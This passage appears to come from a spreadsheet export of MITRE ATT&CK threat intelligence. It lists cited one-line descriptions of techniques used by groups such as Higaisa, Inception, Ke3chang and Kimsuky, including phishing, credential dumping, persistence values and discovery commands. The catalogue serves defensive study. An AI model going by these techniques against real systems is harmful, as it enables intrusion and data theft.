    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has staged malware on fraudulent websites set up to impersonate targeted organizations.(Citation: ClearSky Siamesekitten August 2021)</t>
  </si>
  <si>
    <t>[HEXANE](https://attack.mitre.org/groups/G1001) has used a VisualBasic script named `MicrosoftUpdator.vbs` for execution of a PowerShell keylogger.(Citation: Kaspersky Lyceum October 2021)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) performed padding with null bytes before calculating its hash.(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126)’s JavaScript file used a legitimate Microsoft Office 2007 package to side-load the &lt;code&gt;OINFO12.OCX&lt;/code&gt; dynamic link library.(Citation: PTSecurity Higaisa 2020)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used certutil to decode Base64 binaries at runtime and a 16-byte XOR key to decrypt data.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) exfiltrated data over its C2 channel.(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) has exploited CVE-2018-0798 for execution.(Citation: PTSecurity Higaisa 2020)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used a payload that creates a hidden window.(Citation: PTSecurity Higaisa 2020)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) discovered system proxy settings and used them if available.(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used JavaScript to execute additional files.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)(Citation: PTSecurity Higaisa 2020)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used malicious e-mail attachments to lure victims into executing LNK files.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Higaisa](https://attack.mitre.org/groups/G0126) named a shellcode loader binary &lt;code&gt;svchast.exe&lt;/code&gt; to spoof the legitimate &lt;code&gt;svchost.exe&lt;/code&gt;.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020) </t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) has called various native OS APIs.(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used Base64 encoded compressed payloads.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126)’s shellcode attempted to find the process ID of the current process.(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used a FakeTLS session for C2 communications.(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) added a spoofed binary to the start-up folder for persistence.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) dropped and added &lt;code&gt;officeupdate.exe&lt;/code&gt; to scheduled tasks.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) sent the victim computer identifier in a User-Agent string back to the C2 server every 10 minutes.(Citation: PTSecurity Higaisa 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Higaisa](https://attack.mitre.org/groups/G0126) has sent spearphishing emails containing malicious attachments.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020) </t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used AES-128 to encrypt C2 traffic.(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) collected the system volume serial number, GUID, and computer name.(Citation: PTSecurity Higaisa 2020)(Citation: Malwarebytes Higaisa 2020)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used &lt;code&gt;ipconfig&lt;/code&gt; to gather network configuration information.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used a function to gather the current time.(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) has used VBScript code on the victim's machine.(Citation: PTSecurity Higaisa 2020)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used HTTP and HTTPS to send data back to its C2 server.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used &lt;code&gt;cmd.exe&lt;/code&gt; for execution.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)(Citation: PTSecurity Higaisa 2020)</t>
  </si>
  <si>
    <t>[Higaisa](https://attack.mitre.org/groups/G0126) used an XSL file to run VBScript code.(Citation: PTSecurity Higaisa 2020)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) used a browser plugin to steal passwords and sessions from Internet Explorer, Chrome, Opera, Firefox, Torch, and Yandex.(Citation: Symantec Inception Framework March 2018)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) used a file hunting plugin to collect .txt, .pdf, .xls or .doc files from the infected host.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has used specific malware modules to gather domain membership.(Citation: Symantec Inception Framework March 2018)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has exploited CVE-2012-0158, CVE-2014-1761, CVE-2017-11882 and CVE-2018-0802 for execution.(Citation: Kaspersky Cloud Atlas August 2019)(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Symantec Inception Framework March 2018)(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) used a file listing plugin to collect information about file and directories both on local and remote drives.(Citation: Symantec Inception Framework March 2018)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) lured victims into clicking malicious files for machine reconnaissance and to execute malware.(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Kaspersky Cloud Atlas August 2019)(Citation: Symantec Inception Framework March 2018)(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has used malicious HTA files to drop and execute malware.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) used chains of compromised routers to proxy C2 communications between them and cloud service providers.(Citation: Symantec Inception Framework March 2018)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has encrypted malware payloads dropped on victim machines with AES and RC4 encryption.(Citation: Kaspersky Cloud Atlas December 2014)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has used PowerShell to execute malicious commands and payloads.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas December 2014)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has used a reconnaissance module to identify active processes and other associated loaded modules.(Citation: Symantec Inception Framework March 2018)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has maintained persistence by modifying Registry run key value 
 &lt;code&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\&lt;/code&gt;.(Citation: Kaspersky Cloud Atlas December 2014)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has ensured persistence at system boot by setting the value &lt;code&gt;regsvr32 %path%\ctfmonrn.dll /s&lt;/code&gt;.(Citation: Kaspersky Cloud Atlas December 2014)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has enumerated installed software on compromised systems.(Citation: Symantec Inception Framework March 2018)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has used weaponized documents attached to spearphishing emails for reconnaissance and initial compromise.(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Symantec Inception Framework March 2018)(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has encrypted network communications with AES.(Citation: Kaspersky Cloud Atlas December 2014)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has used a reconnaissance module to gather information about the operating system and hardware on the infected host.(Citation: Symantec Inception Framework March 2018)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has used decoy documents to load malicious remote payloads via HTTP.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has obtained and used open-source tools such as [LaZagne](https://attack.mitre.org/software/S0349).(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has used VBScript to execute malicious commands and payloads.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas December 2014)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has used HTTP, HTTPS, and WebDav in network communications.(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>[Inception](https://attack.mitre.org/groups/G0100) has incorporated at least five different cloud service providers into their C2 infrastructure including CloudMe.(Citation: Kaspersky Cloud Atlas December 2014)(Citation: Symantec Inception Framework March 2018)</t>
  </si>
  <si>
    <t>[IndigoZebra](https://attack.mitre.org/groups/G0136) has established domains, some of which were designed to look like official government domains, for their operations.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>[IndigoZebra](https://attack.mitre.org/groups/G0136) has compromised legitimate email accounts to use in their spearphishing operations.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>[IndigoZebra](https://attack.mitre.org/groups/G0136) has downloaded additional files and tools from its C2 server.(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>[IndigoZebra](https://attack.mitre.org/groups/G0136) sent spearphishing emails containing malicious attachments that urged recipients to review modifications in the file which would trigger the attack.(Citation: HackerNews IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>[IndigoZebra](https://attack.mitre.org/groups/G0136) sent spearphishing emails containing malicious password-protected RAR attachments.(Citation: HackerNews IndigoZebra July 2021)(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t xml:space="preserve">[IndigoZebra](https://attack.mitre.org/groups/G0136) has acquired open source tools such as [NBTscan](https://attack.mitre.org/software/S0590) and Meterpreter for their operations.(Citation: Checkpoint IndigoZebra July 2021)(Citation: Securelist APT Trends Q2 2017) </t>
  </si>
  <si>
    <t>[IndigoZebra](https://attack.mitre.org/groups/G0136) created Dropbox accounts for their operations.(Citation: HackerNews IndigoZebra July 2021)(Citation: Checkpoint IndigoZebra July 2021)</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) has used [Cobalt Strike](https://attack.mitre.org/software/S0154) to empty log files.(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) used &lt;code&gt;wmic.exe&lt;/code&gt; to add a new user to the system.(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) has encrypted domain-controlled systems using [BitPaymer](https://attack.mitre.org/software/S0570).(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) used [PsExec](https://attack.mitre.org/software/S0029) to leverage Windows Defender to disable scanning of all downloaded files and to restrict real-time monitoring.(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) has collected credentials from infected systems, including domain accounts.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) has used Group Policy Objects to deploy batch scripts.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) has downloaded additional scripts, malware, and tools onto a compromised host.(Citation: Crowdstrike Indrik November 2018)(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) has used malicious JavaScript files for several components of their attack.(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) used [Cobalt Strike](https://attack.mitre.org/software/S0154) to carry out credential dumping using ProcDump.(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) has stored collected date in a .tmp file.(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Indrik Spider](https://attack.mitre.org/groups/G0119) has attempted to get users to click on a malicious zipped file.(Citation: Symantec WastedLocker June 2020) </t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) used fake updates for FlashPlayer plugin and Google Chrome as initial infection vectors.(Citation: Crowdstrike Indrik November 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Indrik Spider](https://attack.mitre.org/groups/G0119) has used PowerShell [Empire](https://attack.mitre.org/software/S0363) for execution of malware.(Citation: Crowdstrike Indrik November 2018)(Citation: Symantec WastedLocker June 2020) </t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) has used PowerView to enumerate all Windows Server, Windows Server 2003, and Windows 7 instances in the Active Directory database.(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Indrik Spider](https://attack.mitre.org/groups/G0119) has served fake updates via legitimate websites that have been compromised.(Citation: Crowdstrike Indrik November 2018)	</t>
  </si>
  <si>
    <t>[Indrik Spider](https://attack.mitre.org/groups/G0119) has used [PsExec](https://attack.mitre.org/software/S0029) to stop services prior to the execution of ransomware.(Citation: Symantec WastedLocker June 2020)</t>
  </si>
  <si>
    <t xml:space="preserve">[Indrik Spider](https://attack.mitre.org/groups/G0119) has used the win32_service WMI class to retrieve a list of services from the system.(Citation: Symantec WastedLocker June 2020) </t>
  </si>
  <si>
    <t xml:space="preserve">[Indrik Spider](https://attack.mitre.org/groups/G0119) has used batch scripts on victim's machines.(Citation: Crowdstrike Indrik November 2018) </t>
  </si>
  <si>
    <t xml:space="preserve">[Indrik Spider](https://attack.mitre.org/groups/G0119) has used WMIC to execute commands on remote computers.(Citation: Symantec WastedLocker June 2020) </t>
  </si>
  <si>
    <t>The [Ke3chang](https://attack.mitre.org/groups/G0004) group has been known to compress data before exfiltration.(Citation: Mandiant Operation Ke3chang November 2014)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) is known to use 7Zip and RAR with passwords to encrypt data prior to exfiltration.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has performed frequent and scheduled data collection from victim networks.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has performed  frequent and scheduled data exfiltration from compromised networks.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used compromised credentials to sign into victims’ Microsoft 365 accounts.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>Malware used by [Ke3chang](https://attack.mitre.org/groups/G0004) can run commands on the command-line interface.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) malware RoyalDNS has used DNS for C2.(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) gathered information and files from local directories for exfiltration.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has deobfuscated Base64-encoded shellcode strings prior to loading them.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) performs account discovery using commands such as &lt;code&gt;net localgroup administrators&lt;/code&gt; and &lt;code&gt;net group "REDACTED" /domain&lt;/code&gt; on specific permissions groups.(Citation: Mandiant Operation Ke3chang November 2014)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) performs discovery of permission groups &lt;code&gt;net group /domain&lt;/code&gt;.(Citation: Mandiant Operation Ke3chang November 2014)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) transferred compressed and encrypted RAR files containing exfiltration through the established backdoor command and control channel during operations.(Citation: Mandiant Operation Ke3chang November 2014)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has compromised networks by exploiting Internet-facing applications, including vulnerable Microsoft Exchange and SharePoint servers.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has gained access through VPNs including with compromised accounts and stolen VPN certificates.(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) uses command-line interaction to search files and directories.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used [Mimikatz](https://attack.mitre.org/software/S0002) to generate Kerberos golden tickets.(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used tools to download files to compromised machines.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used keyloggers.(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has dumped credentials, including by using gsecdump.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has dumped credentials, including by using [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has developed custom malware that allowed them to maintain persistence on victim networks.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has dropped their malware into legitimate installed software paths including: `C:\ProgramFiles\Realtek\Audio\HDA\AERTSr.exe`, `C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitRdr64.exe`, `C:\Program Files (x86)\Adobe\Flash Player\AddIns\airappinstaller\airappinstall.exe`, and `C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd64.exe`.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used NTDSDump and other password dumping tools to gather credentials.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used Base64-encoded shellcode strings.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) performs process discovery using &lt;code&gt;tasklist&lt;/code&gt; commands.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>Several [Ke3chang](https://attack.mitre.org/groups/G0004) backdoors achieved persistence by adding a Run key.(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used compromised credentials and a .NET tool to dump data from Microsoft Exchange mailboxes.(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used network scanning and enumeration tools, including [Ping](https://attack.mitre.org/software/S0097).(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used the right-to-left override character in spearphishing attachment names to trick targets into executing .scr and .exe files.(Citation: Mandiant Operation Ke3chang November 2014)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) actors have been known to copy files to the network shares of other computers to move laterally.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used a tool known as RemoteExec (similar to [PsExec](https://attack.mitre.org/software/S0029)) to remotely execute batch scripts and binaries.(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) used a SharePoint enumeration and data dumping tool known as spwebmember.(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) performs operating system information discovery using &lt;code&gt;systeminfo&lt;/code&gt; and has used implants to identify the system language and computer name.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used implants to collect the system language ID of a compromised machine.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has performed local network configuration discovery using &lt;code&gt;ipconfig&lt;/code&gt;.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) performs local network connection discovery using &lt;code&gt;netstat&lt;/code&gt;.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used implants capable of collecting the signed-in username.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) performs service discovery using &lt;code&gt;net start&lt;/code&gt; commands.(Citation: Mandiant Operation Ke3chang November 2014)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has obtained and used tools such as [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used credential dumpers or stealers to obtain legitimate credentials, which they used to gain access to victim accounts.(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) malware including RoyalCli and BS2005 have communicated over HTTP with the C2 server through Internet Explorer (IE) by using the COM interface IWebBrowser2.(Citation: NCC Group APT15 Alive and Strong)(Citation: Microsoft NICKEL December 2021)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) has used batch scripts in its malware to install persistence mechanisms.(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>[Ke3chang](https://attack.mitre.org/groups/G0004) backdoor RoyalDNS established persistence through adding a service called &lt;code&gt;Nwsapagent&lt;/code&gt;.(Citation: NCC Group APT15 Alive and Strong)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has added accounts to specific groups with &lt;code&gt;net localgroup&lt;/code&gt;.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used modified versions of PHProxy to examine web traffic between the victim and the accessed website.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used RC4 encryption before exfil.(Citation: Securelist Kimsuky Sept 2013)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used QuickZip to archive stolen files before exfiltration.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used Blogspot pages for C2.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used Google Chrome browser extensions to infect victims and to steal passwords and cookies.(Citation: Zdnet Kimsuky Dec 2018)(Citation: Netscout Stolen Pencil Dec 2018)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has a HWP document stealer module which changes the default program association in the registry to open HWP documents.(Citation: Securelist Kimsuky Sept 2013)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has signed files with the name EGIS CO,. Ltd..(Citation: ThreatConnect Kimsuky September 2020)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used tools that are capable of obtaining credentials from saved mail.(Citation: Netscout Stolen Pencil Dec 2018)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has used browser extensions including Google Chrome to steal passwords and cookies from browsers. [Kimsuky](https://attack.mitre.org/groups/G0094) has also used Nirsoft's WebBrowserPassView tool to dump the passwords obtained from victims.(Citation: Zdnet Kimsuky Dec 2018)(Citation: CISA AA20-301A Kimsuky)(Citation: Netscout Stolen Pencil Dec 2018)(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has collected Office, PDF, and HWP documents from its victims.(Citation: Securelist Kimsuky Sept 2013)(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has decoded malicious VBScripts using Base64.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) created and used a mailing toolkit to use in spearphishing attacks.(Citation: VirusBulletin Kimsuky October 2019)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has been observed disabling the system firewall.(Citation: Securelist Kimsuky Sept 2013)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has been observed turning off Windows Security Center and can hide the AV software window from the view of the infected user.(Citation: Securelist Kimsuky Sept 2013)(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has compromised legitimate sites and used them to distribute malware.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has registered domains to spoof targeted organizations and trusted third parties.(Citation: ThreatConnect Kimsuky September 2020)(Citation: Zdnet Kimsuky Group September 2020)(Citation: CISA AA20-301A Kimsuky)(Citation: Cybereason Kimsuky November 2020)(Citation: Malwarebytes Kimsuky June 2021)(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has compromised email accounts to send spearphishing e-mails.(Citation: VirusBulletin Kimsuky October 2019)(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has created email accounts for phishing operations.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has collected valid email addresses that were subsequently used in spearphishing campaigns.(Citation: Malwarebytes Kimsuky June 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has set auto-forward rules on victim's e-mail accounts.(Citation: CISA AA20-301A Kimsuky)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has collected victim employee name information.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has exfiltrated data over its C2 channel.(Citation: Securelist Kimsuky Sept 2013)(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has exfiltrated stolen files and data to actor-controlled Blogspot accounts.(Citation: Talos Kimsuky Nov 2021)</t>
  </si>
  <si>
    <t>[Kimsuky](https://attack.mitre.org/groups/G0094) has exploited various vulnerabilities for initial access, including Microsoft Exchange vulnerability CVE-2020-0688.(Citation: KISA Operation Muzabi)</t>
  </si>
  <si>
